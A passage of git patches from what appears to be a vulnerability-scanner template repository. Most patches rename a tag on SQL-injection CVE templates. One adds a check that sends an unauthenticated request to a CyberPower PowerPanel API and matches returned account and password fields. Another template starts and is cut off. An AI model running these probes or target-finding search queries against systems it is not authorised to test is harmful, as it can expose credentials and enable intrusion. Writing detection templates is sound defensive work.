time-based,cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli + tags: time-based-sqli,cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index fd3ae7d78e..7824bbb7fe 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -18,7 +18,7 @@ info: vendor: salephpscripts product: web_directory_free publicwww-query: "/wp-content/plugins/web-directory-free" - tags: time-based,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free + tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index 06f6a29c25..1419cb8d8d 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -24,7 +24,7 @@ info: product: suitecrm shodan-query: title:"SuiteCRM" fofa-query: title="SuiteCRM" - tags: time-based,cve,cve2024,suitecrm,sqli + tags: time-based-sqli,cve,cve2024,suitecrm,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 95428a3246..3b94eb0998 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/productsalert" fofa-query: body="/productsalert" - tags: time-based,cve,cve2023,prestashop,sqli,productsalert + tags: time-based-sqli,cve,cve2023,prestashop,sqli,productsalert flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 07147e2f37..26dcb39b23 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -21,7 +21,7 @@ info: vendor: wedevs product: dokan publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: time-based,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli + tags: time-based-sqli,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 0c090fb037..54208f2f67 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: app="LANWON-䞎ćșŠæ”è§ˆçł»ç»Ÿ" - tags: time-based,cve,cve2024,sqli,blunet + tags: time-based-sqli,cve,cve2024,sqli,blunet flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml index 5db439ab70..f8200580cc 100644 --- a/http/cves/2024/CVE-2024-4295.yaml +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -29,7 +29,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/email-subscribers/" fofa-query: body="/wp-content/plugins/email-subscribers/" - tags: time-based,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli + tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli variables: contact_id: "{{contact_id}}" diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml index 3a93f0fde4..2ee7aa827b 100644 --- a/http/cves/2024/CVE-2024-43917.yaml +++ b/http/cves/2024/CVE-2024-43917.yaml @@ -26,7 +26,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/" publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/" - tags: time-based,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli + tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index 13b63b1f36..fbae0489b0 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/business-directory-plugin/" product: business_directory vendor: businessdirectoryplugin - tags: time-based,cve,cve2024,sqli,business-directory,wordpress,wp-plugin + tags: time-based-sqli,cve,cve2024,sqli,business-directory,wordpress,wp-plugin http: - raw: diff --git a/http/cves/2024/CVE-2024-5765.yaml b/http/cves/2024/CVE-2024-5765.yaml index 3f439e1897..cf38d26cea 100644 --- a/http/cves/2024/CVE-2024-5765.yaml +++ b/http/cves/2024/CVE-2024-5765.yaml @@ -17,7 +17,7 @@ info: max-request: 2 verified: true fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header" - tags: time-based,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth + tags: time-based-sqli,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5975.yaml b/http/cves/2024/CVE-2024-5975.yaml index 311e8778cc..93c3a4c06a 100644 --- a/http/cves/2024/CVE-2024-5975.yaml +++ b/http/cves/2024/CVE-2024-5975.yaml @@ -21,7 +21,7 @@ info: product: cz-loan-management framework: wordpress publicwww-query: "/wp-content/plugins/cz-loan-management" - tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index 2af99dc66f..8a1b1055fb 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -22,7 +22,7 @@ info: publicwww-query: "/wp-content/plugins/quiz-maker/" product: quiz_maker vendor: ays-pro - tags: time-based,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli + tags: time-based-sqli,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-6159.yaml b/http/cves/2024/CVE-2024-6159.yaml index 5b8425ef2b..44722e039e 100644 --- a/http/cves/2024/CVE-2024-6159.yaml +++ b/http/cves/2024/CVE-2024-6159.yaml @@ -18,7 +18,7 @@ info: max-request: 2 framework: wordpress publicwww-query: "/wp-content/plugins/push-notification-for-post-and-buddypress" - tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,push-notification + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,push-notification flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 4052d6731a..cc14fb612e 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -24,7 +24,7 @@ info: product: payplus-payment-gateway framework: wordpress publicwww-query: "/wp-content/plugins/payplus-payment-gateway" - tags: time-based,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment + tags: time-based-sqli,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment http: - raw: diff --git a/http/cves/2024/CVE-2024-6924.yaml b/http/cves/2024/CVE-2024-6924.yaml index aa0b72e06b..dcb6edba1e 100644 --- a/http/cves/2024/CVE-2024-6924.yaml +++ b/http/cves/2024/CVE-2024-6924.yaml @@ -14,7 +14,7 @@ info: product: truebooker framework: wordpress publicwww-query: "/wp-content/plugins/truebooker-appointment-booking" - tags: time-based,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker + tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index dfda870be4..aa3237bc2e 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -21,7 +21,7 @@ info: product: viral-signup framework: wordpress publicwww-query: "/wp-content/plugins/viral-signup" - tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6928.yaml b/http/cves/2024/CVE-2024-6928.yaml index c05729ebcd..fe97f0d272 100644 --- a/http/cves/2024/CVE-2024-6928.yaml +++ b/http/cves/2024/CVE-2024-6928.yaml @@ -20,7 +20,7 @@ info: product: opti-marketing framework: wordpress publicwww-query: "/wp-content/plugins/opti-marketing" - tags: time-based,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml index e0b0e1a8a1..5c9c81ae96 100644 --- a/http/cves/2024/CVE-2024-7188.yaml +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -25,7 +25,7 @@ info: product: quicklancer shodan-query: http.favicon.hash:1099370896 fofa-query: icon_hash="1099370896" - tags: time-based,cve,cve2024,sqli,quicklancer + tags: time-based-sqli,cve,cve2024,sqli,quicklancer http: - raw: diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml index 726b654049..9faa5be6c1 100644 --- a/http/cves/2024/CVE-2024-7854.yaml +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -25,7 +25,7 @@ info: product: woo_inquiry framework: wordpress publicwww-query: "/wp-content/plugins/woo-inquiry" - tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry + tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8484.yaml b/http/cves/2024/CVE-2024-8484.yaml index e171eb8cab..9af62b8805 100644 --- a/http/cves/2024/CVE-2024-8484.yaml +++ b/http/cves/2024/CVE-2024-8484.yaml @@ -26,7 +26,7 @@ info: product: rest-api-to-miniprogram framework: wordpress publicwww-query: "/wp-content/plugins/rest-api-to-miniprogram" - tags: time-based,cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram + tags: time-based-sqli,cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8503.yaml b/http/cves/2024/CVE-2024-8503.yaml index fdb6fd5d19..94b77a77a2 100644 --- a/http/cves/2024/CVE-2024-8503.yaml +++ b/http/cves/2024/CVE-2024-8503.yaml @@ -23,7 +23,7 @@ info: vendor: vicidial product: vicidial fofa-query: icon_hash="1375401192" - tags: time-based,cve,cve2024,vicidial,sqli + tags: time-based-sqli,cve,cve2024,vicidial,sqli flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8522.yaml b/http/cves/2024/CVE-2024-8522.yaml index 33fd461494..beec41976a 100644 --- a/http/cves/2024/CVE-2024-8522.yaml +++ b/http/cves/2024/CVE-2024-8522.yaml @@ -25,7 +25,7 @@ info: product: learnpress shodan-query: html:"/wp-content/plugins/learnpress" fofa-query: body="/wp-content/plugins/learnpress" - tags: time-based,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated + tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9465.yaml b/http/cves/2024/CVE-2024-9465.yaml index b79fa60746..bd99075ec5 100644 --- a/http/cves/2024/CVE-2024-9465.yaml +++ b/http/cves/2024/CVE-2024-9465.yaml @@ -24,7 +24,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: time-based,cve,cve2024,palo-alto,sqli + tags: time-based-sqli,cve,cve2024,palo-alto,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml index 58477c1d9c..43f7cc40c7 100644 --- a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: app="HJSOFT-HCM" - tags: time-based,sqli,hjsoft,management-system + tags: time-based-sqli,sqli,hjsoft,management-system http: - raw: diff --git a/http/vulnerabilities/other/applezeed-sqli.yaml b/http/vulnerabilities/other/applezeed-sqli.yaml index 10fd9cebea..b732eaf3ef 100644 --- a/http/vulnerabilities/other/applezeed-sqli.yaml +++ b/http/vulnerabilities/other/applezeed-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 google-query: intext:"Power BY applezeed.com" - tags: time-based,sqli,unauth,applezeed + tags: time-based-sqli,sqli,unauth,applezeed http: - raw: diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml index 4fc7ff9c8f..11514f7226 100644 --- a/http/vulnerabilities/other/azon-dominator-sqli.yaml +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "Azon Dominator" - tags: time-based,azon,dominator,sqli + tags: time-based-sqli,azon,dominator,sqli http: - raw: diff --git a/http/vulnerabilities/other/csz-cms-sqli.yaml b/http/vulnerabilities/other/csz-cms-sqli.yaml index 94f40c647b..ae15e05f88 100644 --- a/http/vulnerabilities/other/csz-cms-sqli.yaml +++ b/http/vulnerabilities/other/csz-cms-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: time-based,packetstorm,sqli,csz,cms + tags: time-based-sqli,packetstorm,sqli,csz,cms http: - raw: diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 8b53637888..06daa6d1ab 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -17,7 +17,7 @@ info: product: e-cology shodan-query: ecology_JSessionid fofa-query: app="æł›ćŸź-捏搌択慬OA" - tags: time-based,ecology,ecology-oa,sqli + tags: time-based-sqli,ecology,ecology-oa,sqli http: - raw: diff --git a/http/vulnerabilities/other/fumengyun-sqli.yaml b/http/vulnerabilities/other/fumengyun-sqli.yaml index b24eccbfd3..f315f230f9 100644 --- a/http/vulnerabilities/other/fumengyun-sqli.yaml +++ b/http/vulnerabilities/other/fumengyun-sqli.yaml @@ -22,7 +22,7 @@ info: max-request: 1 shodan-query: title:"歚盟äș‘ " fofa-query: title="歚盟äș‘ " - tags: time-based,fumasoft,sqli + tags: time-based-sqli,fumasoft,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/other/groomify-sqli.yaml b/http/vulnerabilities/other/groomify-sqli.yaml index 3362474f32..2f40e133cd 100644 --- a/http/vulnerabilities/other/groomify-sqli.yaml +++ b/http/vulnerabilities/other/groomify-sqli.yaml @@ -12,7 +12,7 @@ info: metadata: verified: "true" max-request: 1 - tags: time-based,sqli,groomify,unauth + tags: time-based-sqli,sqli,groomify,unauth http: - raw: diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml index d86ec91230..97e969feb0 100644 --- a/http/vulnerabilities/other/opencart-core-sqli.yaml +++ b/http/vulnerabilities/other/opencart-core-sqli.yaml @@ -17,7 +17,7 @@ info: fofa-query: icon_hash="-1443008128" product: opencart vendor: opencart - tags: time-based,opencart,sqli + tags: time-based-sqli,opencart,sqli flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml index 72ff9c11dd..ac64f7a448 100644 --- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 fofa-query: "js/PSExtend.js" - tags: time-based,sqli,pingsheng + tags: time-based-sqli,sqli,pingsheng http: - raw: diff --git a/http/vulnerabilities/other/pmb-sqli.yaml b/http/vulnerabilities/other/pmb-sqli.yaml index 3100008247..f5613c221d 100644 --- a/http/vulnerabilities/other/pmb-sqli.yaml +++ b/http/vulnerabilities/other/pmb-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 google-query: inurl:"opac_css" - tags: time-based,sqli,unauth,pmb + tags: time-based-sqli,sqli,unauth,pmb http: - raw: diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml index 9bd17cd4c7..a700d33af5 100644 --- a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml +++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: vendor: i-netsolution product: readymade-unilevel-ecommerce - tags: time-based,ecommerce,readymade,sqli + tags: time-based-sqli,ecommerce,readymade,sqli http: - raw: diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml index cbf2f3dd36..9acdf3a3e0 100644 --- a/http/vulnerabilities/other/sitemap-sql-injection.yaml +++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 2 google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap - tags: time-based,misconfig,sitemap,sqli + tags: time-based-sqli,misconfig,sitemap,sqli http: - raw: diff --git a/http/vulnerabilities/other/stackposts-sqli.yaml b/http/vulnerabilities/other/stackposts-sqli.yaml index 3f7fcf2def..c0a8300171 100644 --- a/http/vulnerabilities/other/stackposts-sqli.yaml +++ b/http/vulnerabilities/other/stackposts-sqli.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"stackposts" - tags: time-based,sqli,unauth,stackposts + tags: time-based-sqli,sqli,unauth,stackposts http: - raw: diff --git a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml index 15117013b6..3e451477b3 100644 --- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.component:"Prestashop" - tags: time-based,prestashop,sqli + tags: time-based-sqli,prestashop,sqli http: - raw: diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index fb8bdcfe59..34103029a1 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"vBulletin" product: vbulletin vendor: vbulletin - tags: time-based,packetstorm,vbulletin,ajaxreg,sqli + tags: time-based-sqli,packetstorm,vbulletin,ajaxreg,sqli http: - raw: diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml index b55d308b79..39482bba97 100755 --- a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml +++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="䞇户眑络-ezOFFICE" - tags: time-based,wanhu,sqli + tags: time-based-sqli,wanhu,sqli http: - raw: diff --git a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml index 53910072bf..1fff1f5c47 100644 --- a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml +++ b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: time-based,sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated + tags: time-based-sqli,sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated http: - raw: diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml index 7a7f7525cf..c8a5273022 100644 --- a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: time-based,wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + tags: time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth http: - raw: diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml index e8604e4d27..98cfae5184 100644 --- a/http/vulnerabilities/wordpress/notificationx-sqli.yaml +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: time-based,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + tags: time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml index 713d2a8c56..23293d2f59 100644 --- a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/adiaha-hotel/" - tags: time-based,sqli,adivaha,wordpress,wp,wp-plugin + tags: time-based-sqli,sqli,adivaha,wordpress,wp,wp-plugin http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml index 685f6699ee..875ea3b429 100644 --- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: time-based,wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress + tags: time-based-sqli,wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml b/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml index 4d47ef1ff9..d2a1475098 100644 --- a/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/smart-manager-for-wp-e-commerce/" - tags: time-based,wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli + tags: time-based-sqli,wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index c8781f7af9..2343d968d9 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -19,7 +19,7 @@ info: vendor: veronalabs product: wp_statistics publicwww-query: /wp-content/plugins/wp-statistics/ - tags: time-based,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp + tags: time-based-sqli,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml index a96f3f7908..6cbd9b3301 100644 --- a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: time-based,wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth + tags: time-based-sqli,wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth http: - raw: diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml index a972c7dd12..92ed46113d 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 fofa-query: icon_hash="-299520369" - tags: time-based,yonyou,grp,sqli + tags: time-based-sqli,yonyou,grp,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml index c929deee00..cb82dc188b 100644 --- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true fofa-query: app="甹揋-NC-Cloud" - tags: time-based,sqli,yonyou,ufida + tags: time-based-sqli,sqli,yonyou,ufida http: - raw: From 3bff6352b8d02458cf508de038bd9794bb82f5a4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 15:59:43 +0530 Subject: [PATCH 142/218] remove-duplicate tag --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 77b16407b8..6888a8e12a 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | This Template detects time-based Blind SQL Injection vulnerability - tags: time-based-sqli,sqli,dast,time-based-sqli,blind + tags: time-based-sqli,sqli,dast,blind flow: http(1) && http(2) @@ -47,4 +47,4 @@ http: - type: dsl dsl: - "duration>=7 && duration <=16" -# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 From bf4f13fcd915b0a0c460ae2b21154303e4011c4d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:02:02 +0530 Subject: [PATCH 143/218] Create CVE-2024-32735.yaml --- http/cves/2024/CVE-2024-32735.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32735.yaml diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml new file mode 100644 index 0000000000..770b709b4f --- /dev/null +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-32735 + +info: + name: CyberPower - Missing Authentication for Critical Function + author: DhiyaneshDK + severity: critical + description: | + An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + impact: | + An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-32735 + cwe-id: CWE-306 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,auth-bupass + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/devices" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"account":' + - '"passwd":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From 6995a773de71fb700035cafb5a1b67ea3ae550c3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:21:04 +0530 Subject: [PATCH 144/218] Create CVE-2024-32736.yaml --- http/cves/2024/CVE-2024-32736.yaml | 48 ++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32736.yaml diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml new file mode 100644 index 0000000000..a1cb9ffac7 --- /dev/null +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-32736 + +info: + name: CyberPower - SQL Injection in 